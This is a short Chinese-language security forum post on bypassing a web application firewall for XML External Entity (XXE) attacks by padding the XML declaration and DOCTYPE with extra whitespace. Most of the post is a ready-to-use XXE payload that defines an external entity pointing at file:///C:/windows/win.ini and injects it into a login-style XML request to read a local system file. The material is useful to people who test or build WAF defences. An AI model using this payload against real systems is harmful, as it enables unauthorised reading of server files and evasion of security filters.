xxe绕过waf-加多个空格-Web安全论坛-网络安全-讯岚社区

xxe绕过waf-加多个空格

XML格式允许在格式化标记属性时使用任意数量的空格,因此攻击者可以在<?xml?><!DOCTYPE>中插入额外的空格,从而绕过此类WAF.

<?xml

version=”1.0″?>

<!DOCTYPE

test1[

<!ELEMENT

foo ANY>

<!ENTITY test

SYSTEM

“file:///C:/windows/win.ini”>

]>

<user><username>&test;</username><password>admin</password></user>

 

20240527152011599-5dc213c9b107057a37396c61ea3477e8_FugfF0Ma-_p6JE6zmCYmNi-GgkKT

 

请登录后发表评论

    没有回复内容